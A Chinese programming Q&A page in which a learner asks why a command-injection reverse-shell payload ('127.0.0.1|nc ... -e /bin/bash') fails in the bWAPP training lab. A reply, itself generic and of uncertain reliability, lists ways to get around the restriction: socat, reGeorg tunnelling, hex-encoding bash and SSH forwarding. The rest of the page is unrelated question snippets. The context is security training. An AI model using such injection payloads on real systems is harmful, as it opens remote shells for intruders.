在bwapp里使用127.0.0.1|nc 192.168.1.105 1234 -e /bin/bash语句
cmd已经打开这个端口的监听
但是收不到
如果只用127.0.0.1|nc 192.168.1.105 1234
cmd是可以收到的
有没有知道是什么原因的
1条回答 默认 最新
IT论之程序员 2023-07-11 21:14关注bwapp中nc命令可能被限制了,不能用于反向连接。
你可以试试以下方法:- 使用bwapp提供的nc替代版本,看看是否可以反向连接
- 使用其他端口转发工具,比如socat或reGeorg来进行端口转发,绕过nc限制
- 查看bwapp的文档,看是否有说明nc的使用限制,以及提供了哪些替代方案
- 尝试绕过系统 restriction,例如先将 bash 编码为十六进制等
- 使用其它协议进行反向连接,例如可以考虑 ssh 转发
总的来说,CTF和渗透测试平台都会对某些功能做限制,需要我们找到这些限制的边界并想办法绕过,这也是训练的一个重要方面。
解决 无用评论 打赏举报
分享
- 2023-04-11 16:34回答 1 已采纳 有几个可能的原因可以排查一下: 检查服务端代码是否有开启监听端口,是否有启动监听线程。你可以在服务端打印一些日志来验证。 检查客户端是否有向服务端发送UDP数据包。可以在客户端打印一些日志来验证。 检
- 2022-07-21 20:57回答 1 已采纳 你请求这个网页,解析返回的数据,获得含有这些文件下载地址的url,去请求这些url就行了呀
- 2022-05-11 16:59回答 1 已采纳 滑块在另外一个 iframe 里面,需要 切换 iframe 才能定位 里面的滑块,参考 https://blog.csdn.net/kikkc/article/details/108003595有用
- 2023-09-18 20:22孤寂204的博客 ” 接下来的一页 讨论不设置SYN,RST,或者ACK位的报文发送到开放端口: “理论上,这不应该发生,如果您确实收到了,丢弃该报文,返回。甚至可以指定一个以逗号分隔的端口列表(如 -PS22,23,25,80,113,1050,...
- 2022-08-23 16:30回答 5 已采纳 没人知道
- 2023-02-19 01:45回答 1 已采纳 获取拉萨市的边界坐标,以便用于裁剪数据。可以通过互联网搜索或者使用GIS软件获取该信息。 使用GIS软件打开全球尺度的CH4数据,并将其转换为与拉萨市相同的投影坐标系。这将确保数据可以正确地对齐并进行
- 2022-03-15 10:45回答 3 已采纳 start是根据数据维度读取数据的起始索引,count是读取个数的向量,其中-1为对应维度上整个条目数据。后面一句用sapply函数是将向量c(1:365)元素作为输入参数,应用到定义的计算平均值的函
- 2020-04-03 12:04一只小白来了的博客 </login><secret>blah</secret></reset> 2、各种协议的利用 SSRF中各个编程语言可以使用的协议如下图所示: 此处使用的合天网安实验室的一个靶场 1、file协议的利用 2、gopher协议的运用 gopher协议是比http协议更早...
- 2019-11-12 16:18回答 2 已采纳 这行会导致崩溃,看上去没什么用,删了吧。 printf(answer);
- 2020-04-22 19:05回答 1 已采纳 https://download.csdn.net/download/fangrk/10375242
- 2023-03-02 14:33回答 3 已采纳 您可以编写一个循环,依次读取每个nc文件并将其数据输出到单独的Excel文件中不同的工作表。以下是一个可能的示例代码: % 定义要读取的nc文件列表 fileList = ["file1.nc", "
- 2023-08-15 21:38程序员小肖的博客 本次测试仅供学习使用,如若非法他用,与平台和学习网络安全技术的...计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
- 2021-06-21 14:46回答 2 已采纳 需要添加headers。 headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
- 2024-05-06 18:15功城师的博客 网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络...从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
- 2019-09-29 12:48weixin_30278237的博客 创建文件 touch test(后缀名可以先不写) echo 123 >test 将123写入test文件 重定向符号 查看文件内容: cat test 复制: cp 源文件位置 目标路径 移动: mv 源文件 目标路径 改名字:mv 原文件名 目标文件名 删...
- 没有解决我的问题, 去提问
问题事件
创建了问题
7月11日
悬赏问题
- ¥15 前端echarts坐标轴问题
- ¥15 CMFCPropertyPage
- ¥15 ad5933的I2C
- ¥15 请问RTX4060的笔记本电脑可以训练yolov5模型吗?
- ¥15 数学建模求思路及代码
- ¥50 silvaco GaN HEMT有栅极场板的击穿电压仿真问题
- ¥15 谁会P4语言啊,我想请教一下
- ¥15 这个怎么改成直流激励源给加热电阻提供5a电流呀
- ¥50 求解vmware的网络模式问题 别拿AI回答
- ¥24 EFS加密后,在同一台电脑解密出错,证书界面找不到对应指纹的证书,未备份证书,求在原电脑解密的方法,可行即采纳